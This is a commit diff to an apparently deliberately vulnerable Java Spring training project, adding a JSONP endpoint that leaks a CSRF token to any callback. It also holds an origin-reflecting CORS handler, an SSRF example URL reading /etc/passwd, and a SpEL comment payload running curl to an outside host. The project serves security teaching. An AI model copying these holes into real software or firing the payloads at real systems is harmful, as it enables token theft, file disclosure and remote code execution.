add fastjsonp

Author: JoyChou93

pom.xml

@@ -248,6 +248,15 @@
             <version>2.9.2</version>
         </dependency>
 
+        <!-- https://mvnrepository.com/artifact/org.projectlombok/lombok -->
+        <dependency>
+            <groupId>org.projectlombok</groupId>
+            <artifactId>lombok</artifactId>
+            <version>1.18.16</version>
+            <scope>provided</scope>
+        </dependency>
+
+
     </dependencies>
 
     <dependencyManagement>

src/main/java/org/joychou/config/Constants.java

@@ -6,4 +6,5 @@ private Constants() {
     }
 
     public static final String REMEMBER_ME_COOKIE = "rememberMe";
+    public static final String ERROR_PAGE = "https://test.joychou.org/error1.html";
 }

src/main/java/org/joychou/config/CsrfTokenBean.java

@@ -0,0 +1,18 @@
+package org.joychou.config;
+
+import org.springframework.context.annotation.Bean;
+import org.springframework.context.annotation.Configuration;
+import org.springframework.security.web.csrf.CookieCsrfTokenRepository;
+
+/**
+ * Reference: https://docs.spring.io/spring-security/site/docs/5.0.x/reference/html/csrf.html
+ */
+
+@Configuration
+public class CsrfTokenBean {
+
+    @Bean
+    public CookieCsrfTokenRepository cookieCsrfTokenRepository() {
+        return CookieCsrfTokenRepository.withHttpOnlyFalse();
+    }
+}

src/main/java/org/joychou/config/CustomCorsConfig.java

@@ -38,7 +38,7 @@ public RequestMappingHandlerMapping getRequestMappingHandlerMapping() {
 
 
     /**
-     * 自定义Cors处理器
+     * 自定义Cors处理器，重写了checkOrigin
      * 自定义校验origin，支持一级域名校验 && 多级域名
      */
     private static class CustomRequestMappingHandlerMapping extends RequestMappingHandlerMapping {

src/main/java/org/joychou/security/Object2Jsonp.java renamed to src/main/java/org/joychou/config/Object2Jsonp.java

@@ -1,7 +1,7 @@
-package org.joychou.security;
+package org.joychou.config;
 
 import org.apache.commons.lang.StringUtils;
-import org.joychou.config.WebConfig;
+import org.joychou.security.SecurityUtil;
 import org.slf4j.Logger;
 import org.slf4j.LoggerFactory;
 import org.springframework.beans.factory.annotation.Value;
@@ -19,6 +19,7 @@
 import javax.servlet.http.HttpServletResponse;
 
 
+
 /**
  * <code>AbstractJsonpResponseBodyAdvice</code> will be removed as of Spring Framework 5.1, use CORS instead.
  * Since Spring Framework 4.1. Springboot 2.1.0 RELEASE use spring framework 5.1.2
@@ -47,7 +48,8 @@ protected void beforeBodyWriteInternal(MappingJacksonValue bodyContainer, MediaT
         HttpServletResponse response = ((ServletServerHttpResponse)res).getServletResponse();
 
         String realJsonpFunc = getRealJsonpFunc(request);
-        if (StringUtils.isNotBlank(realJsonpFunc)){
+        // 如果url带callback，且校验不安全后
+        if ( StringUtils.isNotBlank(realJsonpFunc) ) {
             jsonpReferHandler(request, response);
         }
         super.beforeBodyWriteInternal(bodyContainer, contentType, returnType, req, res);
@@ -84,9 +86,11 @@ private void jsonpReferHandler(HttpServletRequest request, HttpServletResponse r
         if (SecurityUtil.checkURL(refer) == null ){
             logger.error("[-] URL: " + url + "?" + query + "\t" + "Referer: " + refer);
             try{
-                response.setStatus(HttpServletResponse.SC_FORBIDDEN);
-                response.getWriter().write("forbidden");
-                response.flushBuffer();
+                // 使用response.getWriter().write后，后续写入jsonp后还会继续使用response.getWriteer()，导致报错
+//                response.setStatus(HttpServletResponse.SC_FORBIDDEN);
+//                response.getWriter().write(" Referer check error.");
+//                response.flushBuffer();
+                response.sendRedirect(Constants.ERROR_PAGE);
             } catch (Exception e){
                 logger.error(e.toString());
             }

src/main/java/org/joychou/controller/Cookies.java

@@ -12,6 +12,10 @@
 
 import static org.springframework.web.util.WebUtils.getCookie;
 
+
+/**
+ * 某些应用获取用户身份信息可能会直接从cookie中直接获取明文的nick或者id，导致越权问题。
+ */
 @RestController
 @RequestMapping("/cookie")
 public class Cookies {

src/main/java/org/joychou/controller/Cors.java

@@ -25,8 +25,8 @@ public class Cors {
     @GetMapping("/vuln/origin")
     public String vuls1(HttpServletRequest request, HttpServletResponse response) {
         String origin = request.getHeader("origin");
-        response.setHeader("Access-Control-Allow-Origin", origin); // 设置Origin值为Header中获取到的
-        response.setHeader("Access-Control-Allow-Credentials", "true");  // cookie
+        response.setHeader("Access-Control-Allow-Origin", origin); // set origin from header
+        response.setHeader("Access-Control-Allow-Credentials", "true");  // allow cookie
         return info;
     }
 

src/main/java/org/joychou/controller/Jsonp.java

@@ -3,9 +3,14 @@
 import com.alibaba.fastjson.JSON;
 import com.alibaba.fastjson.JSONObject;
 
+import com.alibaba.fastjson.JSONPObject;
+import lombok.extern.slf4j.Slf4j;
+import org.apache.commons.lang.StringUtils;
 import org.joychou.security.SecurityUtil;
 import org.joychou.util.LoginUtils;
+import org.springframework.beans.factory.annotation.Autowired;
 import org.springframework.http.MediaType;
+import org.springframework.security.web.csrf.CookieCsrfTokenRepository;
 import org.springframework.security.web.csrf.CsrfToken;
 import org.springframework.web.bind.annotation.*;
 import org.springframework.web.servlet.ModelAndView;
@@ -14,6 +19,7 @@
 import org.joychou.util.WebUtils;
 
 import javax.servlet.http.HttpServletRequest;
+import javax.servlet.http.HttpServletResponse;
 import java.security.Principal;
 
 
@@ -22,12 +28,15 @@
  * https://github.com/JoyChou93/java-sec-code/wiki/JSONP
  */
 
+@Slf4j
 @RestController
 @RequestMapping("/jsonp")
 public class Jsonp {
 
     private String callback = WebConfig.getBusinessCallback();
 
+    @Autowired
+    CookieCsrfTokenRepository cookieCsrfTokenRepository;
     /**
      * Set the response content-type to application/javascript.
      * <p>
@@ -57,7 +66,7 @@ public String emptyReferer(HttpServletRequest request) {
     }
 
     /**
-     * Adding callback or cback on parameter can automatically return jsonp data.
+     * Adding callback or _callback on parameter can automatically return jsonp data.
      * http://localhost:8080/jsonp/object2jsonp?callback=test
      * http://localhost:8080/jsonp/object2jsonp?_callback=test
      *
@@ -101,11 +110,33 @@ public String safecode(HttpServletRequest request) {
         return WebUtils.json2Jsonp(callback, LoginUtils.getUserInfo2JsonStr(request));
     }
 
-
+    /**
+     * http://localhost:8080/jsonp/getToken?fastjsonpCallback=aa
+     *
+     * object to jsonp
+     */
     @GetMapping("/getToken")
-    public CsrfToken getCsrfToken(CsrfToken token) {
+    public CsrfToken getCsrfToken1(CsrfToken token) {
         return token;
     }
 
+    /**
+     * http://localhost:8080/jsonp/fastjsonp/getToken?fastjsonpCallback=aa
+     *
+     * fastjsonp to jsonp
+     */
+    @GetMapping(value = "/fastjsonp/getToken", produces = "application/javascript")
+    public String getCsrfToken2(HttpServletRequest request) {
+        CsrfToken csrfToken = cookieCsrfTokenRepository.loadToken(request); // get csrf token
+
+        String callback = request.getParameter("fastjsonpCallback");
+        if (StringUtils.isNotBlank(callback)) {
+            JSONPObject jsonpObj = new JSONPObject(callback);
+            jsonpObj.addParameter(csrfToken);
+            return jsonpObj.toString();
+        } else {
+            return csrfToken.toString();
+        }
+    }
 
 }

src/main/java/org/joychou/controller/SSRF.java

@@ -27,7 +27,10 @@ public class SSRF {
 
 
     /**
+     * http://localhost:8080/ssrf/urlConnection/vuln?url=file:///etc/passwd
+     *
      * The default setting of followRedirects is true.
+     * Protocol: file ftp mailto http https jar netdoc
      * UserAgent is Java/1.8.0_102.
      */
     @RequestMapping(value = "/urlConnection/vuln", method = {RequestMethod.POST, RequestMethod.GET})

src/main/java/org/joychou/controller/SpEL.java

@@ -16,7 +16,7 @@
 public class SpEL {
 
     /**
-     * SPEL to RCE
+     * SpEL to RCE
      * http://localhost:8080/spel/vul/?expression=xxx.
      * xxx is urlencode(exp)
      * exp: T(java.lang.Runtime).getRuntime().exec("curl xxx.ceye.io")

src/main/java/org/joychou/controller/URLWhiteList.java

@@ -118,56 +118,33 @@ public String url_bypass(String url) throws MalformedURLException {
 
 
     /**
-     * 一级域名白名单 First-level host whitelist.
-     * http://localhost:8080/url/sec/endswith?url=http://aa.joychou.org
+     * First-level & Multi-level host whitelist.
+     * http://localhost:8080/url/sec?url=http://aa.joychou.org
      */
-    @GetMapping("/sec/endswith")
-    public String sec_endswith(@RequestParam("url") String url) {
+    @GetMapping("/sec")
+    public String sec(@RequestParam("url") String url) {
 
-        String whiteDomainlists[] = {"joychou.org", "joychou.com"};
+        String whiteDomainlists[] = {"joychou.org", "joychou.com", "test.joychou.me"};
 
         if (!SecurityUtil.isHttp(url)) {
             return "SecurityUtil is not http or https";
         }
 
         String host = SecurityUtil.gethost(url);
 
-        // endsWith .
-        for (String domain : whiteDomainlists) {
-            if (host.endsWith("." + domain)) {
-                return "Good url.";
+        for (String whiteHost: whiteDomainlists){
+            if (whiteHost.startsWith(".") && host.endsWith(whiteHost)) {
+                return url;
+            } else if (!whiteHost.startsWith(".") && host.equals(whiteHost)) {
+                return url;
             }
         }
 
         return "Bad url.";
     }
 
-    /**
-     * 多级域名白名单 Multi-level host whitelist.
-     * http://localhost:8080/url/sec/multi_level_hos?url=http://ccc.bbb.joychou.org
-     */
-    @GetMapping("/sec/multi_level_host")
-    public String sec_multi_level_host(@RequestParam("url") String url) {
-        String whiteDomainlists[] = {"aaa.joychou.org", "ccc.bbb.joychou.org"};
-
-        if (!SecurityUtil.isHttp(url)) {
-            return "SecurityUtil is not http or https";
-        }
-
-        String host = SecurityUtil.gethost(url);
-
-        // equals
-        for (String domain : whiteDomainlists) {
-            if (host.equals(domain)) {
-                return "Good url.";
-            }
-        }
-        return "Bad url.";
-    }
-
 
     /**
-     * 多级域名白名单 Multi-level host whitelist.
      * http://localhost:8080/url/sec/array_indexOf?url=http://ccc.bbb.joychou.org
      */
     @GetMapping("/sec/array_indexOf")

src/main/java/org/joychou/filter/ReferFilter.java

@@ -68,7 +68,7 @@ public void doFilter(ServletRequest req, ServletResponse res, FilterChain filter
                 logger.info("[-] URL: " + request.getRequestURL() + "?" + request.getQueryString() + "\t"
                         + "Referer: " + refer);
                 response.setStatus(HttpServletResponse.SC_FORBIDDEN);
-                response.getWriter().write("forbidden");
+                response.getWriter().write(" Referer check error.");
                 response.flushBuffer();
                 return;
             }

src/main/java/org/joychou/security/CustomCorsProcessor.java

@@ -3,12 +3,9 @@
 import org.apache.commons.lang.StringUtils;
 import org.slf4j.Logger;
 import org.slf4j.LoggerFactory;
-import org.springframework.util.CollectionUtils;
 import org.springframework.web.cors.CorsConfiguration;
 import org.springframework.web.cors.DefaultCorsProcessor;
 
-import java.util.List;
-
 public class CustomCorsProcessor extends DefaultCorsProcessor {
 
     private static final Logger logger = LoggerFactory.getLogger(CustomCorsProcessor.class);
@@ -29,7 +26,7 @@ protected String checkOrigin(CorsConfiguration config, String requestOrigin) {
         if (result != null) {
             return result;
         }
-        // List<String> allowedOrigins = config.getAllowedOrigins();
+
         if (StringUtils.isBlank(requestOrigin)) {
             return null;
         }
@@ -39,7 +36,7 @@ protected String checkOrigin(CorsConfiguration config, String requestOrigin) {
 
 
     /**
-     * 校验requestOrigin
+     * 自定义校验requestOrigin
      */
     private String customCheckOrigin(String requestOrigin) {
 

src/main/java/org/joychou/util/HttpUtils.java

@@ -5,6 +5,7 @@
 import org.apache.commons.httpclient.methods.GetMethod;
 import org.apache.commons.io.IOUtils;
 import org.apache.http.HttpResponse;
+import org.apache.http.client.config.RequestConfig;
 import org.apache.http.client.fluent.Request;
 import org.apache.http.client.methods.HttpGet;
 import org.apache.http.impl.client.CloseableHttpClient;
@@ -70,6 +71,8 @@ public static String httpClient(String url) {
 
             CloseableHttpClient client = HttpClients.createDefault();
             HttpGet httpGet = new HttpGet(url);
+            // set redirect enable false
+            // httpGet.setConfig(RequestConfig.custom().setRedirectsEnabled(false).build());
             HttpResponse httpResponse = client.execute(httpGet); // send request
             BufferedReader rd = new BufferedReader(new InputStreamReader(httpResponse.getEntity().getContent()));
 
@@ -91,6 +94,7 @@ public static String URLConnection(String url) {
             URL u = new URL(url);
             URLConnection urlConnection = u.openConnection();
             BufferedReader in = new BufferedReader(new InputStreamReader(urlConnection.getInputStream())); //send request
+            // BufferedReader in = new BufferedReader(new InputStreamReader(u.openConnection().getInputStream()));
             String inputLine;
             StringBuilder html = new StringBuilder();
 
@@ -205,5 +209,4 @@ public static String HttpAsyncClients(String url) {
 
     }
 
-
 }